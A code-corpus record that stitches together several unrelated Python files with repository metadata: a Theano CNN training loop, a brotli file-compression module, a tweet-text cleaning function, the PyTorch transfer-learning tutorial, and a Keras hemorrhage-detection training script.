追加した1はチャンネル数 # ここではグレイスケール画像なのでチャンネル数は1 layer0_input = x.reshape((batch_size, 1, 28, 28)) # filterのnkerns[0]は20 layer0 = ConvLayer(rng, input=layer0_input, image_shape=(batch_size, 1, 28, 28), filter_shape=(nkerns[0], 1, 5, 5)) layer1 = PoolLayer(layer0.output, poolsize=(2, 2)) # filterのnkerns[1]は50 layer2 = ConvLayer(rng, input=layer1.output, image_shape=(batch_size, nkerns[0], 12, 12), filter_shape=(nkerns[1], nkerns[0], 5, 5)) layer3 = PoolLayer(layer2.output, poolsize=(2, 2)) # layer2_input # layer1の出力は4x4ピクセルの画像が50チャンネル分4次元Tensorで出力されるが、多層パーセプトロンの入力にそのまま使えない # 4x4x50=800次元のベクトルに変換する(batch_size, 50, 4, 4)から(batch_size, 800)にする layer4_input = layer3.output.flatten(2) # 500ユニットの隠れレイヤー # layer2_inputで作成した入力ベクトルのサイズ=n_in layer4 = HiddenLayer(rng, input=layer4_input, n_in=nkerns[1]*4*4, n_out=n_hidden, activation=T.tanh) # 出力は500ユニット layer5 = LogisticRegression(input=layer4.output, n_in=n_hidden, n_out=10) # cost(普通の多層パーセプトロンは正則化項が必要だが、CNNは構造自体で正則化の効果を含んでいる) cost = layer5.negative_log_likelihood(y) # testモデル # 入力indexからgivensによって計算した値を使ってlayer3.errorsを計算する test_model = theano.function([index], layer5.errors(y), givens={x:test_set_x[index*batch_size : (index + 1)*batch_size], y: test_set_y[index*batch_size : (index + 1)*batch_size]}) # validationモデル validate_model = theano.function([index], layer5.errors(y), givens={x:valid_set_x[index*batch_size : (index + 1)*batch_size], y: valid_set_y[index*batch_size : (index + 1)*batch_size]}) # 微分用のパラメータ(pooling層にはパラメータがない) params = layer5.params + layer4.params + layer2.params + layer0.params # コスト関数パラメータについてのの微分 grads = T.grad(cost, params) # パラメータの更新 updates = [(param_i, param_i - learning_rate * grad_i) for param_i, grad_i in zip(params, grads)] # trainモデル train_model = theano.function(inputs=[index], outputs=cost, updates=updates, givens={x: train_set_x[index*batch_size : (index + 1)*batch_size], y:train_set_y[index*batch_size : (index+1)*batch_size]}) # optimize print "train model ..." patience = 10000 patience_increase = 2 improvement_threshold = 0.995 validation_frequency = min(n_train_batches, patience/2) best_validation_loss = np.inf best_iter = 0 test_score = 0 start_time = timeit.default_timer() epoch = 0 done_looping = False fp1 = open('log/lenet_validation_error.txt', 'w') fp2 = open('log/lenet_test_error.txt', 'w') while(epoch < n_epochs) and (not done_looping): epoch = epoch + 1 for minibatch_index in xrange(n_train_batches): minibatch_avg_cost = train_model(minibatch_index) iter = (epoch - 1) * n_train_batches + minibatch_index if (iter + 1) % validation_frequency == 0: ## validationのindexをvalidationのエラー率を計算するfunctionに渡し、配列としてかえす validation_losses = [validate_model(i) for i in xrange(n_valid_batches)] # 平均してscoreにする this_validation_loss = np.mean(validation_losses) print('epoch %i, minibatch %i/%i, validation error %f ' % (epoch, minibatch_index+1, n_train_batches, this_validation_loss*100.)) fp1.write("%d\t%f\n" % (epoch, this_validation_loss*100)) if this_validation_loss < best_validation_loss: if(this_validation_loss < best_validation_loss * improvement_threshold): patience = max(patience, iter*patience_increase) best_validation_loss = this_validation_loss best_iter = iter ## testのindex をtestのエラー率を計算するfunctionに渡し、配列として渡す test_losses = [test_model(i) for i in xrange(n_test_batches)] ## 平均してscoreにする test_score = np.mean(test_losses) ## print('epoch %i, minibatch %i/%i, test error %f ' % (epoch, minibatch_index+1, n_train_batches, test_score*100.)) fp2.write("%d\t%f\n" % (epoch, test_score*100)) if patience <= iter: done_looping = True break fp1.close() fp2.close() end_time = timeit.default_timer() print(('optimization complete. Best validation score of %f obtained at iteration %i, with test performance %f') % (best_validation_loss * 100., best_iter + 1, test_score * 100.)) print >> sys.stderr,('This code for file ' + os.path.split(__file__)[1] + ' ran for %.2fm' % ((end_time - start_time)/60.)) import cPickle cPickle.dump(layer0, open("model/cnn_layer0.pkl", "wb")) cPickle.dump(layer2, open("model/cnn_layer2.pkl", "wb")) cPickle.dump(layer4, open("model/cnn_layer4.pkl", "wb")) cPickle.dump(layer5, open("model/cnn_layer5.pkl", "wb")) if __name__ == '__main__': optimize_cnn_lenet()
39.287879
204
0.662296
795abb3ab0475b8728bd43026538a2409edb8b5b
10,876
py
Python
brotli_file.py
youknowone/brotli-file
dd65e8cc15a0799dd19bd870658246ec666e2107
[ "BSD-2-Clause-FreeBSD" ]
5
2020-08-02T05:40:25.000Z
2022-03-27T18:17:20.000Z
brotli_file.py
youknowone/brotli-file
dd65e8cc15a0799dd19bd870658246ec666e2107
[ "BSD-2-Clause-FreeBSD" ]
2
2020-08-02T05:40:13.000Z
2020-08-02T05:48:16.000Z
brotli_file.py
youknowone/brotli-file
dd65e8cc15a0799dd19bd870658246ec666e2107
[ "BSD-2-Clause-FreeBSD" ]
1
2020-08-21T02:14:26.000Z
2020-08-21T02:14:26.000Z
"""Functions that read and write brotli files. The user of the file doesn't have to worry about the compression, but random access is not allowed.""" # forked from CPython 3.8.1 gzip.py which is # based on Andrew Kuchling's minigzip.py distributed with the zlib module import os import io import _compression __all__ = ["BrotliFile", "open"] READ, WRITE = 1, 2 builtins_open = open def open(filename, mode="rb", quality=11, lgwin=22, lgblock=0, encoding=None, errors=None, newline=None): """Open a brotli-compressed file in binary or text mode. The filename argument can be an actual filename (a str or bytes object), or an existing file object to read from or write to. The mode argument can be "r", "rb", "w", "wb", "x", "xb", "a" or "ab" for binary mode, or "rt", "wt", "xt" or "at" for text mode. The default mode is "rb", and the default compresslevel is 9. For binary mode, this function is equivalent to the BrotliFile constructor: BrotliFile(filename, mode, compresslevel). In this case, the encoding, errors and newline arguments must not be provided. For text mode, a BrotliFile object is created, and wrapped in an io.TextIOWrapper instance with the specified encoding, error handling behavior, and line ending(s). """ if "t" in mode: if "b" in mode: raise ValueError("Invalid mode: %r" % (mode,)) else: if encoding is not None: raise ValueError("Argument 'encoding' not supported in binary mode") if errors is not None: raise ValueError("Argument 'errors' not supported in binary mode") if newline is not None: raise ValueError("Argument 'newline' not supported in binary mode") gz_mode = mode.replace("t", "") if isinstance(filename, (str, bytes, os.PathLike)): binary_file = BrotliFile(filename, gz_mode, quality, lgwin, lgblock) elif hasattr(filename, "read") or hasattr(filename, "write"): binary_file = BrotliFile( None, gz_mode, quality, lgwin, lgblock, filename) else: raise TypeError("filename must be a str or bytes object, or a file") if "t" in mode: return io.TextIOWrapper(binary_file, encoding, errors, newline) else: return binary_file class BrotliFile(_compression.BaseStream): """The BrotliFile class simulates most of the methods of a file object with the exception of the truncate() method. This class only supports opening files in binary mode. If you need to open a compressed file in text mode, use the brotli.open() function. """ # Overridden with internal file object to be closed, if only a filename # is passed in myfileobj = None def __init__(self, filename=None, mode=None, quality=11, lgwin=22, lgblock=0, fileobj=None): """Constructor for the BrotliFile class. At least one of fileobj and filename must be given a non-trivial value. The new class instance is based on fileobj, which can be a regular file, an io.BytesIO object, or any other object which simulates a file. It defaults to None, in which case filename is opened to provide a file object. The mode argument can be any of 'r', 'rb', 'a', 'ab', 'w', 'wb', 'x', or 'xb' depending on whether the file will be read or written. The default is the mode of fileobj if discernible; otherwise, the default is 'rb'. A mode of 'r' is equivalent to one of 'rb', and similarly for 'w' and 'wb', 'a' and 'ab', and 'x' and 'xb'. """ if mode and ('t' in mode or 'U' in mode): raise ValueError("Invalid mode: {!r}".format(mode)) if mode and 'b' not in mode: mode += 'b' if fileobj is None: fileobj = self.myfileobj = builtins_open(filename, mode or 'rb') if filename is None: filename = getattr(fileobj, 'name', '') if not isinstance(filename, (str, bytes)): filename = '' else: filename = os.fspath(filename) if mode is None: mode = getattr(fileobj, 'mode', 'rb') if mode.startswith('r'): self.mode = READ raw = _BrotliReader(fileobj, _BrotliDecompressor) self._buffer = io.BufferedReader(raw) self.name = filename elif mode.startswith(('w', 'a', 'x')): import brotli self.mode = WRITE self.size = 0 self.offset = 0 self.name = filename self.compress = brotli.Compressor( quality=quality, lgwin=lgwin, lgblock=lgblock) else: raise ValueError("Invalid mode: {!r}".format(mode)) self.fileobj = fileobj @property def mtime(self): """Last modification time read from stream, or None""" return self._buffer.raw._last_mtime def __repr__(self): s = repr(self.fileobj) return '<brotli ' + s[1:-1] + ' ' + hex(id(self)) + '>' def write(self, data): self._check_not_closed() if self.mode != WRITE: import errno raise OSError(errno.EBADF, "write() on read-only BrotliFile object") if self.fileobj is None: raise ValueError("write() on closed BrotliFile object") if isinstance(data, bytes): length = len(data) else: # accept any data that supports the buffer protocol data = memoryview(data) length = data.nbytes if length > 0: self.fileobj.write(self.compress.process(data)) self.size += length self.offset += length return length def read(self, size=-1): self._check_not_closed() if self.mode != READ: import errno raise OSError(errno.EBADF, "read() on write-only BrotliFile object") return self._buffer.read(size) def read1(self, size=-1): """Implements BufferedIOBase.read1() Reads up to a buffer's worth of data if size is negative.""" self._check_not_closed() if self.mode != READ: import errno raise OSError(errno.EBADF, "read1() on write-only BrotliFile object") if size < 0: size = io.DEFAULT_BUFFER_SIZE return self._buffer.read1(size) def peek(self, n): self._check_not_closed() if self.mode != READ: import errno raise OSError(errno.EBADF, "peek() on write-only BrotliFile object") return self._buffer.peek(n) @property def closed(self): return self.fileobj is None def close(self): fileobj = self.fileobj if fileobj is None: return self.fileobj = None try: if self.mode == WRITE: fileobj.write(self.compress.flush()) fileobj.write(self.compress.finish()) elif self.mode == READ: self._buffer.close() finally: myfileobj = self.myfileobj if myfileobj: self.myfileobj = None myfileobj.close() def flush(self): self._check_not_closed() if self.mode == WRITE: # Ensure the compressor's buffer is flushed self.fileobj.write(self.compress.flush()) self.fileobj.flush() def fileno(self): """Invoke the underlying file object's fileno() method. This will raise AttributeError if the underlying file object doesn't support fileno(). """ return self.fileobj.fileno() def rewind(self): '''Return the uncompressed stream file position indicator to the beginning of the file''' if self.mode != READ: raise OSError("Can't rewind in write mode") self._buffer.seek(0) def readable(self): return self.mode == READ def writable(self): return self.mode == WRITE def seekable(self): return True def seek(self, offset, whence=io.SEEK_SET): if self.mode == WRITE: if whence != io.SEEK_SET: if whence == io.SEEK_CUR: offset = self.offset + offset else: raise ValueError('Seek from end not supported') if offset < self.offset: raise OSError('Negative seek in write mode') count = offset - self.offset chunk = b'\0' * 1024 for i in range(count // 1024): self.write(chunk) self.write(b'\0' * (count % 1024)) elif self.mode == READ: self._check_not_closed() return self._buffer.seek(offset, whence) return self.offset def readline(self, size=-1): self._check_not_closed() return self._buffer.readline(size) class _BrotliDecompressor: eof = False def __init__(self): import brotli self.decompressor = brotli.Decompressor() self.needs_input = True self._buffer = bytearray(1) self._bufview = memoryview(self._buffer) self._buflen = len(self._buffer) self._pos = 0 def _check_buffer(self, new_len): if self._buflen < new_len: new_len = max(self._buflen, new_len) del self._bufview self._buffer.extend(b'\0' * (new_len * 2)) self._bufview = memoryview(self._buffer) self._buflen = len(self._buffer) def decompress(self, raw, size): if raw: uncompress = self.decompressor.process(raw) new_len = len(uncompress) self.needs_input = False else: uncompress = b'' new_len = 0 if self._pos >= size: r = bytes(self._bufview[:size]) pos = self._pos - size self._check_buffer(pos + new_len) self._bufview[:pos] = self._bufview[size:self._pos] self._bufview[pos:pos + new_len] = uncompress self._pos = pos + new_len elif self._pos + new_len >= size: used_len = size - self._pos r = bytes(self._bufview[:self._pos]) + uncompress[:used_len] rem_len = new_len - used_len self._check_buffer(rem_len) self._bufview[:rem_len] = uncompress[used_len:] self._pos = rem_len else: r = bytes(self._bufview[:self._pos]) + uncompress self._pos = 0 self.needs_input = True return r class _BrotliReader(_compression.DecompressReader): def read(self, size=-1): try: return super(_BrotliReader, self).read(size) except EOFError: return b''
33.361963
81
0.586797
795abb6bd7d79a2a847a69277c80bbb662a022d6
1,286
py
Python
app/extract_texts.py
sy-app/ll-now-extract-words
6c3b49330741a8661b613990082ec99e6e595cd5
[ "MIT" ]
1
2021-11-24T10:42:40.000Z
2021-11-24T10:42:40.000Z
app/extract_texts.py
sy-app/ll-now-extract-words
6c3b49330741a8661b613990082ec99e6e595cd5
[ "MIT" ]
7
2022-02-08T07:58:24.000Z
2022-03-27T08:15:51.000Z
app/extract_texts.py
sy-app/ll-now-extract-words
6c3b49330741a8661b613990082ec99e6e595cd5
[ "MIT" ]
null
null
null
import re import boto3 import unicodedata def extract_texts(tweets): # 除去する単語をDynamoDBから取得 table = boto3.resource('dynamodb').Table('ll_now') primary_key = {"primary": 'remove_word'} res = table.get_item(Key=primary_key) remove_words = res['Item']['word'] remove_words_pattern = '|'.join(remove_words) texts = [] for tweet in tweets: text = tweet['text'] hashtags = ['#' + ht['text'] for ht in tweet['entities']['hashtags']] # 自身を包含する別のハッシュタグの一部を除去しないようにソート hashtags.sort(key=len, reverse=True) # ハッシュタグを除去 if hashtags: hashtags_pattern = '|'.join(hashtags) text = re.sub(hashtags_pattern, ' ', text) # URLを除去 text = re.sub(r'https?://[\w/:%#\$&\?\(\)~\.=\+\-…]+', ' ', text) # 改行を除去 # text=re.sub('\n', ' ', text) # Unicode正規化 text = unicodedata.normalize('NFKC', text) # 半角のシングルクォーテーションを全角に変換 text = re.sub(r"'", "’", text) # 絵文字などを除去 text = re.sub(r'[^,.、。!?ー〜0-9a-zA-Zぁ-んァ-ヶ亜-腕纊-黑一-鿕・Α-ω’]', ' ', text) # 不要な単語を除去 text = re.sub(remove_words_pattern, '', text) # ツイートを跨いでコロケーション判定されないように末尾にターミネータを付加 text += ' eotw' texts.append(text) return texts
29.227273
77
0.557543
795abbd63e797f9ef9075891edcc5307ce12b9e0
11,133
py
Python
beginner_source/transfer_learning_tutorial.py
jakec888/tutorials
94cb6a3635b9b5ccb8a59c5346addba6901cd15d
[ "BSD-3-Clause" ]
1
2020-06-07T02:30:10.000Z
2020-06-07T02:30:10.000Z
beginner_source/transfer_learning_tutorial.py
pietern/tutorials
e0791cff1502df01719fb6cb29e817021c877d0e
[ "BSD-3-Clause" ]
null
null
null
beginner_source/transfer_learning_tutorial.py
pietern/tutorials
e0791cff1502df01719fb6cb29e817021c877d0e
[ "BSD-3-Clause" ]
null
null
null
# -*- coding: utf-8 -*- """ Transfer Learning Tutorial ========================== **Author**: `Sasank Chilamkurthy <https://chsasank.github.io>`_ In this tutorial, you will learn how to train your network using transfer learning. You can read more about the transfer learning at `cs231n notes <https://cs231n.github.io/transfer-learning/>`__ Quoting these notes, In practice, very few people train an entire Convolutional Network from scratch (with random initialization), because it is relatively rare to have a dataset of sufficient size. Instead, it is common to pretrain a ConvNet on a very large dataset (e.g. ImageNet, which contains 1.2 million images with 1000 categories), and then use the ConvNet either as an initialization or a fixed feature extractor for the task of interest. These two major transfer learning scenarios look as follows: - **Finetuning the convnet**: Instead of random initializaion, we initialize the network with a pretrained network, like the one that is trained on imagenet 1000 dataset. Rest of the training looks as usual. - **ConvNet as fixed feature extractor**: Here, we will freeze the weights for all of the network except that of the final fully connected layer. This last fully connected layer is replaced with a new one with random weights and only this layer is trained. """ # License: BSD # Author: Sasank Chilamkurthy from __future__ import print_function, division import torch import torch.nn as nn import torch.optim as optim from torch.optim import lr_scheduler import numpy as np import torchvision from torchvision import datasets, models, transforms import matplotlib.pyplot as plt import time import os import copy plt.ion() # interactive mode ###################################################################### # Load Data # --------- # # We will use torchvision and torch.utils.data packages for loading the # data. # # The problem we're going to solve today is to train a model to classify # **ants** and **bees**. We have about 120 training images each for ants and bees. # There are 75 validation images for each class. Usually, this is a very # small dataset to generalize upon, if trained from scratch. Since we # are using transfer learning, we should be able to generalize reasonably # well. # # This dataset is a very small subset of imagenet. # # .. Note :: # Download the data from # `here <https://download.pytorch.org/tutorial/hymenoptera_data.zip>`_ # and extract it to the current directory. # Data augmentation and normalization for training # Just normalization for validation data_transforms = { 'train': transforms.Compose([ transforms.RandomResizedCrop(224), transforms.RandomHorizontalFlip(), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]) ]), 'val': transforms.Compose([ transforms.Resize(256), transforms.CenterCrop(224), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]) ]), } data_dir = 'data/hymenoptera_data' image_datasets = {x: datasets.ImageFolder(os.path.join(data_dir, x), data_transforms[x]) for x in ['train', 'val']} dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=4, shuffle=True, num_workers=4) for x in ['train', 'val']} dataset_sizes = {x: len(image_datasets[x]) for x in ['train', 'val']} class_names = image_datasets['train'].classes device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu") ###################################################################### # Visualize a few images # ^^^^^^^^^^^^^^^^^^^^^^ # Let's visualize a few training images so as to understand the data # augmentations. def imshow(inp, title=None): """Imshow for Tensor.""" inp = inp.numpy().transpose((1, 2, 0)) mean = np.array([0.485, 0.456, 0.406]) std = np.array([0.229, 0.224, 0.225]) inp = std * inp + mean inp = np.clip(inp, 0, 1) plt.imshow(inp) if title is not None: plt.title(title) plt.pause(0.001) # pause a bit so that plots are updated # Get a batch of training data inputs, classes = next(iter(dataloaders['train'])) # Make a grid from batch out = torchvision.utils.make_grid(inputs) imshow(out, title=[class_names[x] for x in classes]) ###################################################################### # Training the model # ------------------ # # Now, let's write a general function to train a model. Here, we will # illustrate: # # - Scheduling the learning rate # - Saving the best model # # In the following, parameter ``scheduler`` is an LR scheduler object from # ``torch.optim.lr_scheduler``. def train_model(model, criterion, optimizer, scheduler, num_epochs=25): since = time.time() best_model_wts = copy.deepcopy(model.state_dict()) best_acc = 0.0 for epoch in range(num_epochs): print('Epoch {}/{}'.format(epoch, num_epochs - 1)) print('-' * 10) # Each epoch has a training and validation phase for phase in ['train', 'val']: if phase == 'train': model.train() # Set model to training mode else: model.eval() # Set model to evaluate mode running_loss = 0.0 running_corrects = 0 # Iterate over data. for inputs, labels in dataloaders[phase]: inputs = inputs.to(device) labels = labels.to(device) # zero the parameter gradients optimizer.zero_grad() # forward # track history if only in train with torch.set_grad_enabled(phase == 'train'): outputs = model(inputs) _, preds = torch.max(outputs, 1) loss = criterion(outputs, labels) # backward + optimize only if in training phase if phase == 'train': loss.backward() optimizer.step() # statistics running_loss += loss.item() * inputs.size(0) running_corrects += torch.sum(preds == labels.data) if phase == 'train': scheduler.step() epoch_loss = running_loss / dataset_sizes[phase] epoch_acc = running_corrects.double() / dataset_sizes[phase] print('{} Loss: {:.4f} Acc: {:.4f}'.format( phase, epoch_loss, epoch_acc)) # deep copy the model if phase == 'val' and epoch_acc > best_acc: best_acc = epoch_acc best_model_wts = copy.deepcopy(model.state_dict()) print() time_elapsed = time.time() - since print('Training complete in {:.0f}m {:.0f}s'.format( time_elapsed // 60, time_elapsed % 60)) print('Best val Acc: {:4f}'.format(best_acc)) # load best model weights model.load_state_dict(best_model_wts) return model ###################################################################### # Visualizing the model predictions # ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ # # Generic function to display predictions for a few images # def visualize_model(model, num_images=6): was_training = model.training model.eval() images_so_far = 0 fig = plt.figure() with torch.no_grad(): for i, (inputs, labels) in enumerate(dataloaders['val']): inputs = inputs.to(device) labels = labels.to(device) outputs = model(inputs) _, preds = torch.max(outputs, 1) for j in range(inputs.size()[0]): images_so_far += 1 ax = plt.subplot(num_images//2, 2, images_so_far) ax.axis('off') ax.set_title('predicted: {}'.format(class_names[preds[j]])) imshow(inputs.cpu().data[j]) if images_so_far == num_images: model.train(mode=was_training) return model.train(mode=was_training) ###################################################################### # Finetuning the convnet # ---------------------- # # Load a pretrained model and reset final fully connected layer. # model_ft = models.resnet18(pretrained=True) num_ftrs = model_ft.fc.in_features # Here the size of each output sample is set to 2. # Alternatively, it can be generalized to nn.Linear(num_ftrs, len(class_names)). model_ft.fc = nn.Linear(num_ftrs, 2) model_ft = model_ft.to(device) criterion = nn.CrossEntropyLoss() # Observe that all parameters are being optimized optimizer_ft = optim.SGD(model_ft.parameters(), lr=0.001, momentum=0.9) # Decay LR by a factor of 0.1 every 7 epochs exp_lr_scheduler = lr_scheduler.StepLR(optimizer_ft, step_size=7, gamma=0.1) ###################################################################### # Train and evaluate # ^^^^^^^^^^^^^^^^^^ # # It should take around 15-25 min on CPU. On GPU though, it takes less than a # minute. # model_ft = train_model(model_ft, criterion, optimizer_ft, exp_lr_scheduler, num_epochs=25) ###################################################################### # visualize_model(model_ft) ###################################################################### # ConvNet as fixed feature extractor # ---------------------------------- # # Here, we need to freeze all the network except the final layer. We need # to set ``requires_grad == False`` to freeze the parameters so that the # gradients are not computed in ``backward()``. # # You can read more about this in the documentation # `here <https://pytorch.org/docs/notes/autograd.html#excluding-subgraphs-from-backward>`__. # model_conv = torchvision.models.resnet18(pretrained=True) for param in model_conv.parameters(): param.requires_grad = False # Parameters of newly constructed modules have requires_grad=True by default num_ftrs = model_conv.fc.in_features model_conv.fc = nn.Linear(num_ftrs, 2) model_conv = model_conv.to(device) criterion = nn.CrossEntropyLoss() # Observe that only parameters of final layer are being optimized as # opposed to before. optimizer_conv = optim.SGD(model_conv.fc.parameters(), lr=0.001, momentum=0.9) # Decay LR by a factor of 0.1 every 7 epochs exp_lr_scheduler = lr_scheduler.StepLR(optimizer_conv, step_size=7, gamma=0.1) ###################################################################### # Train and evaluate # ^^^^^^^^^^^^^^^^^^ # # On CPU this will take about half the time compared to previous scenario. # This is expected as gradients don't need to be computed for most of the # network. However, forward does need to be computed. # model_conv = train_model(model_conv, criterion, optimizer_conv, exp_lr_scheduler, num_epochs=25) ###################################################################### # visualize_model(model_conv) plt.ioff() plt.show()
33.035608
92
0.603431
795abcb805969bdf90b9b8811861d47bd44ce9aa
2,049
py
Python
src/train.py
kshannon/intracranial-hemorrhage-detection
fd65c44c487ab07faaed5d39cc238f70b95891bc
[ "MIT" ]
7
2019-09-30T02:30:49.000Z
2020-01-25T04:23:19.000Z
src/train.py
kshannon/intracranial-hemorrhage-detection
fd65c44c487ab07faaed5d39cc238f70b95891bc
[ "MIT" ]
18
2019-09-28T18:41:46.000Z
2019-11-10T21:42:02.000Z
src/train.py
kshannon/intracranial-hemorrhage-detection
fd65c44c487ab07faaed5d39cc238f70b95891bc
[ "MIT" ]
4
2020-01-25T04:23:21.000Z
2020-11-17T17:34:24.000Z
from datetime import datetime from model import MyDeepModel, create_submission from data_loader import read_testset, read_trainset, DataGenerator import keras as K from sklearn.model_selection import ShuffleSplit # from K_applications.resnet import ResNet50 from keras.applications.inception_v3 import InceptionV3 from keras.applications.inception_resnet_v2 import InceptionResNetV2, preprocess_input from keras.applications.densenet import DenseNet121 from keras.applications.mobilenet_v2 import MobileNetV2 test_images_dir = '../../data/stage_1_test_images/' train_images_dir = '../../data/stage_1_train_images/' trainset_filename = "../../data/stage_1_train.csv" testset_filename = "../../stage_1_sample_submission.csv" num_epochs = 10 img_shape = (256,256,3) batch_size=32 TRAINING =True # If False, then just load model and predict engine=InceptionV3 model_filename="InceptionV3_{}.hdf5".format(datetime.now().strftime('%Y_%m_%d_%H_%M_%S')) #model_filename="wrapper_2019_11_02_22_06_45.hdf5" # obtain model model = MyDeepModel(engine=engine, input_dims=img_shape, batch_size=batch_size, learning_rate=5e-4, num_epochs=num_epochs, decay_rate=0.8, decay_steps=1, weights="imagenet", verbose=1, train_image_dir=train_images_dir, model_filename=model_filename) model.load("epoch2.hdf5") #model.load(model_filename) # Use previous checkpoint if (TRAINING == True): df = read_trainset(trainset_filename) ss = ShuffleSplit(n_splits=10, test_size=0.1, random_state=816).split(df.index) # lets go for the first fold only train_idx, valid_idx = next(ss) # Train the model model.fit_model(df.iloc[train_idx], df.iloc[valid_idx]) test_df = read_testset(testset_filename) test_generator = DataGenerator(test_df.index, None, 1, img_shape, test_images_dir) best_model = K.models.load_model(model.model_filename, compile=False) prediction_df = create_submission(best_model, test_generator, test_df)
34.728814
89
0.752074